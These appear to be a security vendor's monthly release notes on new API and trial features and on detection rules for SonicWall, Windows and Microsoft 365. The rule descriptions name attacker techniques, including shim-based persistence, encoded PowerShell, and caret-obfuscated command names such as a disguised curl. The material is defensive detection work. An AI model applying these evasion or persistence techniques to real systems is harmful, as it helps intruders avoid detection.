This month’s releases introduce new platform enhancements, including a public API evidence endpoint and MSP trial provisioning to improve reporting, integrations, and onboarding. We also added new detections across SonicWall, Windows, and Microsoft 365 to identify unauthorized access, persistence, and command obfuscation techniques. Additional updates improve detection accuracy, reduce false positives, and streamline integrations and reporting workflows.
Feature and Platform Updates
Public API: We added a new /evidence endpoint to make it easier to understand via the API why a finding triggered, and support deeper reporting without needing to log into the app. See more about the endpoint in our Swagger documentation, here.
MSP Trial Provisioning: MSPs can now create new accounts with a 30-day Automate trial directly from the MSP Portal. This allows you to quickly onboard customers and give them full access to Automate’s capabilities, including detection, response, and support, without any upfront commitment. A built-in countdown helps track the trial period, making it easy to demonstrate value and convert customers before the trial ends. Learn more about Automate trials, here.
Detection Updates
| Log Type |
Details |
| SonicWall |
NEW - SonicWall: SSL-VPN Enable Detected
This new detection rule detects when SSL-VPN has been enabled on a SonicWall device. While this may be legitimate administrator activity, enabling SSL-VPN after a compromise can provide attackers with persistent remote access to the network.
Default state: Enabled |
SonicWall
|
NEW - SonicWall: Management Access Enabled
This new detection rule detects configuration changes that enable management access, such as HTTPS or SSH, on a SonicWall device. Unauthorized management access changes may indicate an attacker gaining administrative control after a compromise.
Default state: Disabled
|
| Windows |
NEW - Active Directory Computer Account Creation
This new detection rule detects when a computer account is created in Active Directory, which may indicate a new device being joined to the domain. Verify that this activity was performed by an authorized administrator.
Default state: Disabled
|
Windows
|
NEW - Potential Application Shimming via Sdbinst
This new detection rule detects the execution of sdbinst.exe to install a shim database (.sdb) file. While the Application Shim Infrastructure is a legitimate Windows compatibility feature, it has been abused for persistence by threat actors, including FIN7.
Default state: Enabled
|
Windows
|
NEW - PowerShell: Encoded Command Execution
This new detection rule detects suspicious encoded PowerShell commands. While encoded commands are commonly used by administrative scripts and software, threat actors frequently combine encoding with other obfuscation techniques to evade detection.
Default state: Disabled
|
Windows
|
NEW - Windows Command Shell Caret Obfuscation
This new detection rule detects commands executed with caret character obfuscation inserted between letters in command names. This evasion technique, where characters like ^c^u^r^l are interpreted as curl by the Windows command shell, is strongly associated with malicious activity.
Default state: Enabled
|
Azure Signin
|
UPDATE - Azure: Entra ID Anomalous Agent Sign-In Activity
We fixed an issue where the detection could incorrectly trigger when conditional access status data was parsed into an unexpected field, causing false positive findings for successful sign-ins that should have been excluded.
|
Azure Signin / Microsoft 365
|
UPDATE - Microsoft 365: User Authentication from New Country
We added the app field to this rule’s evidence, so findings now display which application was used for authentication.
|
| Microsoft 365 |
UPDATE - Microsoft 365: Potential Mailbox Permissions Change
We refined this rule’s exclusion logic to reduce false positives from NT Authority/System accounts and Microsoft Exchange Admin API operations.
|
| Microsoft 365 |
UPDATE - Microsoft 365: Significant eDiscovery Activities Detected
We updated the name of the “M365 eDiscovery Role Change” detection rule in the app, fixing a bug that was causing a mismatch between the rule and its findings, which were correctly appearing as “Microsoft 365: Significant eDiscovery Activities Detected.” The rule and findings now consistently match in name.
|
| Traffic |
UPDATE - RDP Connection from Public IP
We added exclusions for Cisco FTD connection lifecycle events (teardown, NAT translation, and flow offload logs) to prevent false positives.
|
| Windows |
UPDATE - Endpoint TOR Traffic
We extended detection coverage to macOS and Linux endpoints in addition to Windows, enabling identification of TOR traffic across all Blumira Agent-supported operating systems.
|
| Windows |
UPDATE - Password Spraying - 4625 & 4648
We adjusted the user threshold for improved detection accuracy and updated the investigation workflow.
|
| Windows |
UPDATE - PowerShell: Execution from Suspicious Parent Process
We reworked this detection to shift its focus from encoded command execution to a broader parent-process-based approach. The detection rule now identifies PowerShell spawned by suspicious parent processes, such as macro hosts, LOLBins, browsers, and web shells.
|
| Windows |
RETIRED - Potential Brute Force - 4625 & 4771
After a thorough review, we determined this rule was generating excessive noise without producing true positive matches, particularly from 4771 events related to expired cached credentials, and decided to retire this rule.
|
Bug Fixes and Improvements
Bug Fixes
- Microsoft Defender for Cloud Apps Cloud Connector: We improved the stability of the Defender for Cloud Apps integration by resolving timeout scenarios that were impacting some customers who had recently configured the connector.
- Microsoft 365 Cloud Connector: We corrected labeling and UX messaging for some edge-cases to make those errors clearer and easier for users to act on.
Improvements
- Global Reports: We added the
description field to the "Azure - Login Outside of United States" global report, which indicates whether or not login attempts were successful.
- Public API Rate Limits: We increased API rate limits for MSPs to 100 requests per second, enabling faster data retrieval at scale.
February 2026 Release Notes
In case you missed the February updates, you can find and review those notes here.
